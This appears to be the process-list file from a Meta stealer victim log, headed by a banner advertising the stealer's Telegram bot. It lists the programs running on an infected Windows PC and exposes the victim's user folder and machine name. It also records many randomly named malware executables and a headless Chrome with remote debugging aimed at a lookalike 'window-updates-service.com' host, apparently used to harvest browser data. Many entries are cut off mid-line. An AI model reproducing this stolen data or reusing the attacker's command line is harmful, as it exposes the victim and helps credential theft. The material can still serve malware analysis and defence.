Process List

***********************************************
* _ _ _ _ *
* / \ / \ / \ / \ *
* ( M | E | T | A ) *
* \_/ \_/ \_/ \_/ *
* *
* Telegram: https://t.me/metastealer_bot *
***********************************************
ID: 896, Name: csrss.exe, CommandLine:

===============
ID: 1120, Name: winlogon.exe, CommandLine: winlogon.exe
===============
ID: 1272, Name: fontdrvhost.exe, CommandLine: "fontdrvhost.exe"
===============
ID: 1368, Name: dwm.exe, CommandLine: "dwm.exe"
===============
ID: 6424, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
WspService
===============
ID: 5280, Name: ETDCtrl.exe, CommandLine: C:\Windows\system32\ETDCtrl.exe
===============
ID: 432, Name: sihost.exe, CommandLine: sihost.exe
===============
BthAppGroup -p -s BluetoothUserService
===============
UnistackSvcGroup -s CDPUserSvc
===============
UnistackSvcGroup -s WpnUserService
===============
ID: 7820, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-
A59CA119A75E}
===============
ID: 8016, Name: ctfmon.exe, CommandLine: "ctfmon.exe"
===============
ID: 7172, Name: explorer.exe, CommandLine: C:\Windows\Explorer.EXE
===============
ID: 7732, Name: igfxEMN.exe, CommandLine: "C:\Windows\System32\DriverStore\
FileRepository\cui_dch.inf_amd64_efb119a73d6b56f6\igfxEMN.exe"
===============
ClipboardSvcGroup -p -s cbdhsvc
===============
ID: 8692, Name: RtkAudUService64.exe, CommandLine: "C:\Windows\System32\
DriverStore\FileRepository\realtekservice.inf_amd64_844e1459fc4a4c84\
RtkAudUService64.exe" -admin
===============
ID: 8660, Name: StartMenuExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\
StartMenuExperienceHost.exe" -
ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
===============
ID: 8140, Name: TextInputHost.exe, CommandLine: "C:\Windows\SystemApps\
MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -
ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
===============
ID: 9452, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9644, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
===============
===============
ID: 10740, Name: lmgrd.exe, CommandLine: lmgrd.exe -z -c License.lic
===============
===============
ID: 5532, Name: SecurityHealthSystray.exe, CommandLine: "C:\Windows\System32\
SecurityHealthSystray.exe"
===============
ID: 3824, Name: RtkAudUService64.exe, CommandLine: "C:\Windows\System32\
DriverStore\FileRepository\realtekservice.inf_amd64_844e1459fc4a4c84\
RtkAudUService64.exe" -background
===============
ID: 11120, Name: adskflex.exe, CommandLine: adskflex.exe -T DESKTOP-S8Q13OL 11.18 -
1 -c ";License.lic;" -lmgrd_port 6978 -srv
uocafxNp7b0QtGj0sMJOOwFWCRIpkavm2StWMdgYsJy1EJlYAdCwgEfrieAmDuq --lmgrd_start
6440130c -vdrestart 0
===============
ID: 11132, Name: EPPCCMON.EXE, CommandLine: "C:\Program Files (x86)\EPSON Software\
Epson Printer Connection Checker\EPPCCMON.EXE"
===============
ID: 10408, Name: splwow64.exe, CommandLine: C:\Windows\splwow64.exe 8192
===============
ID: 11212, Name: E_YATIUNE.EXE, CommandLine: "C:\Windows\System32\spool\drivers\
x64\3\E_YATIUNE.EXE" /EPT "EPLTarget\P0000000000000000" /M "L3150 Series"
===============
ID: 524, Name: WINWORD.EXE, CommandLine: "C:\Program Files\Microsoft Office\Root\
Office16\WINWORD.EXE" -Embedding
===============
ID: 9256, Name: E_YATIUNE.EXE, CommandLine: "C:\Windows\System32\spool\drivers\
x64\3\E_YATIUNE.EXE" /EPT "EPLTarget\P0000000000000003" /M "L3150 Series"
===============
ID: 9760, Name: acrotray.exe, CommandLine: "C:\Program Files (x86)\Adobe\Acrobat
DC\Acrobat\AcroTray.exe"
===============
ID: 11400, Name: ai.exe, CommandLine: "C:\Program Files\Microsoft Office\root\vfs\
ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "6C44CBDB-D1C9-4906-BEDB-
6CAF3F34CDDF" "5D05B1A0-E313-42DF-B3B7-D0F1D358CADA" "524"
===============
ID: 11912, Name: E_YATIR4E.EXE, CommandLine: "C:\Windows\System32\spool\drivers\
x64\3\E_YATIR4E.EXE" /EPT "EPLTarget\P0000000000000002" /M "L3050 Series"
===============
ID: 11956, Name: E_YATIR4E.EXE, CommandLine: "C:\Windows\System32\spool\drivers\
x64\3\E_YATIR4E.EXE" /EPT "EPLTarget\P0000000000000004" /M "L3050 Series"
===============
ID: 11988, Name: utweb.exe, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\
Roaming\uTorrent Web\utweb.exe" /MINIMIZED
===============
ID: 12216, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
===============
Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\CONSULT
SOIL TESTING\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-
annotation=ptype=crashpad-handler "--database=C:\Users\CONSULT SOIL TESTING\
AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\CONSULT
SOIL TESTING\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1
--annotation=channel= --annotation=chromium-version=112.0.5615.121 "--
annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --
annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --
annotation=ver=112.0.1722.48 --initial-client-
data=0x104,0x108,0x10c,0xe0,0x118,0x7ffeb29335f0,0x7ffeb2933600,0x7ffeb2933610
===============
Application\msedge.exe" --type=gpu-process --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAA
AAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-
platform-channel-handle=2056 --field-trial-
handle=2064,i,13283826837411068617,7950193566803354289,131072 /prefetch:2
===============
Application\msedge.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-
===============
type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --
mojo-platform-channel-handle=2492 --field-trial-
===============
ID: 12544, Name: Cortana.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.549981C3F5F10_4.2204.13303.0_x64__8wekyb3d8bbwe\Cortana.exe" -
ServerName:App.AppX2y379sjp88wjq1y80217mddj3fargf2y.mca
===============
ID: 13192, Name: CCXProcess.exe, CommandLine: "C:\Program Files\Adobe\Adobe
Creative Cloud Experience\CCXProcess.exe"
===============
ID: 13212, Name: node.exe, CommandLine: "C:\Program Files\Adobe\Adobe Creative
Cloud Experience\libs\node.exe" "C:\Program Files\Adobe\Adobe Creative Cloud
Experience\js\main.js"
===============
ID: 13304, Name: EEventManager.exe, CommandLine: "C:\Program Files (x86)\EPSON
Software\Event Manager\EEventManager.exe"
===============
===============
AarSvcGroup -p -s AarSvc
===============
ID: 13740, Name: svchost.exe, CommandLine: C:\Windows\System32\svchost.exe -k
UnistackSvcGroup
===============
ID: 13912, Name: AdobeIPCBroker.exe, CommandLine: "C:\Program Files (x86)\Common
Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe" "-launchedbyvulcan-
13212 C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe"
===============
ID: 13544, Name: chrome.exe, CommandLine: "C:\Program Files\Google\Chrome\
Application\chrome.exe"
===============
Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\CONSULT
SOIL TESTING\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-
AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\CONSULT
SOIL TESTING\AppData\Local\Google\Chrome\User Data"
--url=https://clients2.google.com/cr/report --annotation=channel= --
annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=109.0.5414.120 --
initial-client-
data=0x100,0x104,0x108,0xdc,0x10c,0x7ffebda76b58,0x7ffebda76b68,0x7ffebda76b78
===============
Application\chrome.exe" --type=gpu-process --gpu-
AAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAA
AOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-
handle=1704 --field-trial-
===============
Application\chrome.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-
===============
type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --
mojo-platform-channel-handle=2320 --field-trial-
===============
ID: 10276, Name: ShellExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -
ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
===============
===============
ID: 9488, Name: ApplicationFrameHost.exe, CommandLine: C:\Windows\system32\
ApplicationFrameHost.exe -Embedding
===============
ID: 14240, Name: CalculatorApp.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.WindowsCalculator_11.2210.0.0_x64__8wekyb3d8bbwe\CalculatorApp.exe" -
ServerName:App.AppXjvs2nbwryyqjz1h8d8v70f70g3rgdcyb.mca
===============
===============
ID: 14660, Name: SettingSyncHost.exe, CommandLine: C:\Windows\system32\
SettingSyncHost.exe -Embedding
===============
Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1.25 --
num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11
--time-ticks-at-unix-epoch=-1681920756214484 --launch-time-ticks=60786734 --mojo-
===============
Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService
--lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7884 --
field-trial-handle=1884,i,1119834537848833595,4337284666919190545,131072
/prefetch:8
===============
ID: 15352, Name: CompPkgSrv.exe, CommandLine: C:\Windows\System32\CompPkgSrv.exe -
Embedding
===============
ID: 2312, Name: SystemSettings.exe, CommandLine: "C:\Windows\ImmersiveControlPanel\
SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
===============
ID: 3520, Name: UserOOBEBroker.exe, CommandLine: C:\Windows\System32\oobe\
UserOOBEBroker.exe -Embedding
===============
Application\chrome.exe" --headless --disable-gpu --remote-debugging-port=9222
http://www.google.com.983259571923150.window-updates-service.com
===============
Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\CONSULT
SOIL TESTING\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-
AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\CONSULT
SOIL TESTING\AppData\Local\Google\Chrome\User Data"
--url=https://clients2.google.com/cr/report --annotation=channel= --
annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=109.0.5414.120 --
initial-client-
data=0x108,0x10c,0x110,0xe4,0x114,0x7ffebda76b58,0x7ffebda76b68,0x7ffebda76b78
===============
Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl
--headless --gpu-
AAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAA
AOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-
angle=swiftshader-webgl --mojo-platform-channel-handle=1392 --field-trial-
handle=1416,i,13742419236676180750,4348982519359973086,131072 --disable-
features=PaintHolding /prefetch:2
===============
type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-
angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-
handle=1596 --field-trial-
handle=1416,i,13742419236676180750,4348982519359973086,131072 --disable-
===============
Application\chrome.exe" --type=renderer --headless --lang=en-GB --first-renderer-
process --remote-debugging-port=9222 --allow-pre-commit-input --disable-databases
--disable-gpu-compositing --lang=en-GB --device-scale-factor=1.25 --num-raster-
threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --time-
ticks-at-unix-epoch=-1681920756215069 --launch-time-ticks=99541493 --mojo-platform-
channel-handle=2132 --field-trial-
handle=1416,i,13742419236676180750,4348982519359973086,131072 --disable-
===============
ID: 2428, Name: Creative Cloud.exe, CommandLine: "C:\Program Files\Adobe\Adobe
Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
===============
ID: 10404, Name: Adobe Desktop Service.exe, CommandLine: "C:\Program Files (x86)\
Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe" --
onOSstartup=true --showwindow=false --waitForRegistration=true
===============
ID: 3524, Name: Adobe CEF Helper.exe, CommandLine: "C:\Program Files\Common Files\
Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --field-trial-
handle=2288,833156078714718913,9232573452446156536,131072 --disable-
features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker --lang=en-US --
service-sandbox-type=none --no-sandbox --use-angle=swiftshader-webgl --use-gl=angle
--locales-dir-path="C:\Program Files\Common Files\Adobe\Adobe Desktop Common\CEF\
locales" --log-severity=warning --user-agent="Mozilla/5.0 (Windows NT 10.0.0;
WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
CreativeCloud/5.7.0.1307" --lang=en --user-data-dir="C:\Users\CONSULT SOIL TESTING\
AppData\Local\CEF\User Data" --log-file="C:\Users\CONSUL~1\AppData\Local\Temp\
CreativeCloud\ACC\CEF.log" --mojo-platform-channel-handle=2364 /prefetch:8
===============
Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe" --type=renderer --locales-dir-
path="C:\Program Files\Common Files\Adobe\Adobe Desktop Common\CEF\locales" --log-
severity=warning --user-agent="Mozilla/5.0 (Windows NT 10.0.0; WOW64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
CreativeCloud/5.7.0.1307" --user-data-dir="C:\Users\CONSULT SOIL TESTING\AppData\
Local\CEF\User Data" --no-sandbox --autoplay-policy=no-user-gesture-required --js-
flags=--expose-gc --log-file="C:\Users\CONSUL~1\AppData\Local\Temp\CreativeCloud\
ACC\CEF.log" --field-trial-
handle=2288,833156078714718913,9232573452446156536,131072 --disable-
features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker --disable-gpu-
compositing --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --
enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-
handle=2588 /prefetch:1
===============
ID: 15004, Name: Creative Cloud Helper.exe, CommandLine: "C:\Program Files\Adobe\
Adobe Creative Cloud\ACC\Creative Cloud Helper.exe" --remoteCoreExt=NGLWrapper --
remoteHelper=CCH_NGLW
===============
ID: 4032, Name: LockApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe" -
ServerName:WindowsDefaultLockScreen.AppX7y4nbzq37zn4ks9k7amqjywdat7d3j2z.mca
===============
===============
ID: 6272, Name: Creative Cloud Helper.exe, CommandLine: "C:\Program Files\Adobe\
Adobe Creative Cloud\ACC\Creative Cloud Helper.exe" --remoteApplet=UPI_BL --
remoteAppletInstanceID=4FA2D6C0-40BE-4D3C-8AA7-9B97B479E8D0 --remoteHelper=CCH_UPI
===============
ID: 6508, Name: CoreSync.exe, CommandLine: "C:\Program Files (x86)\Adobe\Adobe
Sync\CoreSync\CoreSync.exe"
===============
ID: 15700, Name: CCLibrary.exe, CommandLine: "C:\Program Files\Common Files\Adobe\
Creative Cloud Libraries\CCLibrary.exe"
===============
ID: 15752, Name: node.exe, CommandLine: "C:\Program Files\Common Files\Adobe\
Creative Cloud Libraries\libs\node.exe" "C:\Program Files\Common Files\Adobe\
Creative Cloud Libraries\js\server.js"
===============
Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe" --type=renderer --locales-dir-
path="C:\Program Files\Common Files\Adobe\Adobe Desktop Common\CEF\locales" --log-
severity=warning --user-agent="Mozilla/5.0 (Windows NT 10.0.0; WOW64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
CreativeCloud/5.7.0.1307" --user-data-dir="C:\Users\CONSULT SOIL TESTING\AppData\
Local\CEF\User Data" --no-sandbox --autoplay-policy=no-user-gesture-required --js-
flags=--expose-gc --log-file="C:\Users\CONSUL~1\AppData\Local\Temp\CreativeCloud\
ACC\CEF.log" --field-trial-
handle=2288,833156078714718913,9232573452446156536,131072 --disable-
features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker --disable-gpu-
compositing --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --
enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-
channel-handle=3364 /prefetch:1
===============
type=proxy_resolver.mojom.ProxyResolverFactory --lang=en-US --service-sandbox-
type=service --mojo-platform-channel-handle=4304 --field-trial-
===============
type=proxy_resolver.mojom.ProxyResolverFactory --lang=en-US --service-sandbox-
type=service --mojo-platform-channel-handle=5420 --field-trial-
===============
Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe" --type=utility --utility-sub-
type=proxy_resolver.mojom.ProxyResolverFactory --field-trial-
handle=2288,833156078714718913,9232573452446156536,131072 --disable-
features=CalculateNativeWinOcclusion,WinUseBrowserSpellChecker --lang=en-US --
service-sandbox-type=proxy_resolver --no-sandbox --use-angle=swiftshader-webgl --
use-gl=angle --locales-dir-path="C:\Program Files\Common Files\Adobe\Adobe Desktop
Common\CEF\locales" --log-severity=warning --user-agent="Mozilla/5.0 (Windows NT
10.0.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81
Safari/537.36 CreativeCloud/5.7.0.1307" --lang=en --user-data-dir="C:\Users\CONSULT
SOIL TESTING\AppData\Local\CEF\User Data" --log-file="C:\Users\CONSUL~1\AppData\
Local\Temp\CreativeCloud\ACC\CEF.log" --mojo-platform-channel-handle=3980
/prefetch:8
===============
ID: 1572, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:ShellFeedsUI.AppX88fpyyrd21w8wqe62wzsjh5agex7tf1e.mca
===============
ID: 14076, Name: dllhost.exe, CommandLine: C:\Windows\system32\DllHost.exe
/Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
===============
ID: 16348, Name: SDXHelper.exe, CommandLine: "C:\Program Files\Microsoft Office\
Root\Office16\SDXHelper.exe" -Embedding
===============
ID: 13396, Name: Video.UI.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.ZuneVideo_10.22091.10031.0_x64__8wekyb3d8bbwe\Video.UI.exe" -
ServerName:Microsoft.ZuneVideo.AppX758ya5sqdjd98rx6z7g95nw6jy7bqx9y.mca
===============
===============
ID: 15504, Name: Microsoft.Photos.exe, CommandLine: "C:\Program Files\WindowsApps\
Microsoft.Windows.Photos_2022.30120.12007.0_x64__8wekyb3d8bbwe\
Microsoft.Photos.exe" -ServerName:App.AppXzst44mncqdg84v7sv6p7yznqwssy6f7f.mca
===============
===============
ID: 3212, Name: BridgeCommunication.exe, CommandLine: "C:\Windows\System32\
DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_f0454c515430e99a\x64\
BridgeCommunication.exe" 7d81deda-1f1e-4cc9-b3c7-66344ba72df6 Global\46a5ff4c-b72f-
4222-8766-437accf142e1 1820
===============
===============
===============
===============
===============
===============
===============
===============
===============
===============
===============
===============
ID: 8816, Name: smartscreen.exe, CommandLine: C:\Windows\System32\smartscreen.exe -
Embedding
===============
ID: 14564, Name: WinRAR.exe, CommandLine: "C:\Program Files\WinRAR\WinRAR.exe" "C:\
Users\CONSULT SOIL TESTING\Downloads\File.7z"
===============
ID: 5936, Name: SearchProtocolHost.exe, CommandLine: "C:\Windows\system32\
SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3280135814-
1481727056-1528295059-10025_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-
3280135814-1481727056-1528295059-10025 1 -2147483646 "Software\Microsoft\Windows
Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\
ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"
===============
===============
===============
ID: 2388, Name: OausKRQhaYx5IYt1vYpCc80n.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\OausKRQhaYx5IYt1vYpCc80n.exe"
===============
ID: 5728, Name: fyYM3BnrLqnui_QcizmcS8NP.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\fyYM3BnrLqnui_QcizmcS8NP.exe"
===============
ID: 14772, Name: AddInProcess32.exe, CommandLine: "C:\Windows\Microsoft.NET\
Framework64\v4.0.30319\AddInProcess32.exe"
===============
ID: 8048, Name: jYmgPA, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\Local\
Temp\ufTVJGQKRJAvHedhVT\jYmgPA"
===============
===============
ID: 15628, Name: NMN2nF0rpT.exe, CommandLine: "C:\Users\CONSULT SOIL TESTING\
AppData\Roaming\uWQ4axEW\NMN2nF0rpT.exe"
===============
ID: 8828, Name: FQHLmn, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\Local\
Temp\HxZzcWJAeKrQWZppbS\FQHLmn" - --silent --allusers=0
===============
Temp\HxZzcWJAeKrQWZppbS\FQHLmn" --type=crashpad-handler /prefetch:7 --monitor-self-
AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\
Users\CONSULT SOIL TESTING\AppData\Roaming\Opera Software\Opera Stable\
crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --
annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --
data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x5ba933e0,0x5ba933f0,0x5ba933fc
===============
Temp\HxZzcWJAeKrQWZppbS\FQHLmn" --backend --install --import-browser-data=0 --
enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0
--general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1
--installfolder="C:\Users\CONSULT SOIL TESTING\AppData\Local\Programs\Opera" --
profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --
setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --
server-tracking-data=server_tracking_data --initial-pid=8828 --package-dir-
prefix="C:\Users\CONSUL~1\AppData\Local\Temp\.opera\Opera Installer Temp\
opera_package_20230419223645" --session-guid=aca3b1d4-bcea-4c77-b04c-cf725f6a5969
--server-tracking-
blob="NDdlNzhmMDkzYmYwZWNlMzAwMjEwYjRkNTZkYzAyOGFiZTU2NGUxOWZhOTlmYzY4YjBkMTFlMzZkN
WUxZjViNzp7ImNvdW50cnkiOiJBRSIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9k
dWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/
dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF
0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIi
wicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY4MTkyOTQxNS42MzY5IiwidXNlcmFnZW50IjoiT
W96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNy4wOyBXaW5kb3dzIE5UIDEwLjA7IFdPVzY0OyBUcmlk
ZW50LzcuMDsgLk5FVDQuMEM7IC5ORVQ0LjBFOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuMC4
zMDcyOTsgLk5FVCBDTFIgMy41LjMwNzI5KSIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2NyIsIm1lZGl1bSI6Im
FwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMWJiMmYyNWUtODIzNy00NGIxLTliYTItOGViNDMwMTQ0N
TM0In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-
handle=C804000000000000
===============
Temp\HxZzcWJAeKrQWZppbS\FQHLmn" --type=crashpad-handler /prefetch:7 --monitor-self-
AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\
Users\CONSULT SOIL TESTING\AppData\Roaming\Opera Software\Opera Stable\
crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --
annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --
data=0x304,0x308,0x30c,0x2d4,0x310,0x5b1333e0,0x5b1333f0,0x5b1333fc
===============
ID: 10744, Name: OzCnVS, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\Local\
Temp\oLSFaWFOelWfunHyRx\OzCnVS"
===============
ID: 37680, Name: Install.exe, CommandLine: .\Install.exe
===============
ID: 59752, Name: Install.exe, CommandLine: .\Install.exe /S /site_id "385104"
===============
ID: 65472, Name: svcservice.exe, CommandLine: "C:\Users\CONSULT SOIL TESTING\
AppData\Roaming\telemetry\svcservice.exe"
===============
ID: 91784, Name: vyoLvZ, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\Local\
Temp\wDfsOUkfCgHGTAKNAN\vyoLvZ" - /S
===============
ID: 16544, Name: lw10pD7.exe, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\
Roaming\PdwOD8\lw10pD7.exe" --Admin IsNotAutoStart IsNotTask
===============
ID: 16936, Name: WinRAR.exe, CommandLine: "C:\Program Files\WinRAR\WinRAR.exe" "C:\
Users\CONSULT SOIL TESTING\Downloads\Install.7z"
===============
ID: 17920, Name: build2.exe, CommandLine: "C:\Users\CONSULT SOIL TESTING\AppData\
Local\ddf544b1-449c-4bdd-a583-fd1c0fa1c089\build2.exe"
===============
ID: 17944, Name: Install.exe, CommandLine: "C:\Users\CONSUL~1\AppData\Local\Temp\
Rar$EXb16936.42266\Install.exe"
===============
ID: 18484, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 20960, Name: svcservice.exe, CommandLine: "C:\Users\CONSULT SOIL TESTING\
AppData\Roaming\telemetry\svcservice.exe"
===============
ID: 105700, Name: hy6Hoelk1x_kEPvwubpgEET4.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\hy6Hoelk1x_kEPvwubpgEET4.exe"
===============
ID: 109104, Name: is-K5PRT.tmp, CommandLine: "C:\Users\CONSUL~1\AppData\Local\Temp\
is-9TM11.tmp\is-K5PRT.tmp" /SL4 $50748 "C:\Users\CONSULT SOIL TESTING\Pictures\
Minor Policy\hy6Hoelk1x_kEPvwubpgEET4.exe" 2562561 56320
===============
ID: 14604, Name: UrmCt2gO0F7gGiBxtJEafvRR.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\UrmCt2gO0F7gGiBxtJEafvRR.exe"
===============
ID: 38636, Name: ijV6rJsB_BHz7r7pG16cQZzx.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\ijV6rJsB_BHz7r7pG16cQZzx.exe"
===============
ID: 38604, Name: GCJ7jIcwcnLDCpvNjpTYtJTH.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\GCJ7jIcwcnLDCpvNjpTYtJTH.exe"
===============
ID: 17724, Name: CHc2AuPyjWHfq9s2dMrP8HKh.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\CHc2AuPyjWHfq9s2dMrP8HKh.exe"
===============
ID: 12632, Name: Tg5MlmqsgMCHfF0xYHFR6e2V.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\Tg5MlmqsgMCHfF0xYHFR6e2V.exe"
===============
ID: 18204, Name: 97Fovac4wG3gxa3BsmHaNpZG.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\97Fovac4wG3gxa3BsmHaNpZG.exe"
===============
ID: 18676, Name: xjQinxGtGBGWCTQOIcI2SHL3.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\xjQinxGtGBGWCTQOIcI2SHL3.exe"
===============
ID: 18668, Name: 12x8yBTiIfFBAUMP8XL9FR00.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\12x8yBTiIfFBAUMP8XL9FR00.exe"
===============
ID: 18644, Name: AwCvEyv9Wp2vaRK1acEEpgsg.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\AwCvEyv9Wp2vaRK1acEEpgsg.exe"
===============
ID: 18712, Name: Rec419.exe, CommandLine: "C:\Program Files (x86)\FKDsoftFR\Rec419\
Rec419.exe"
===============
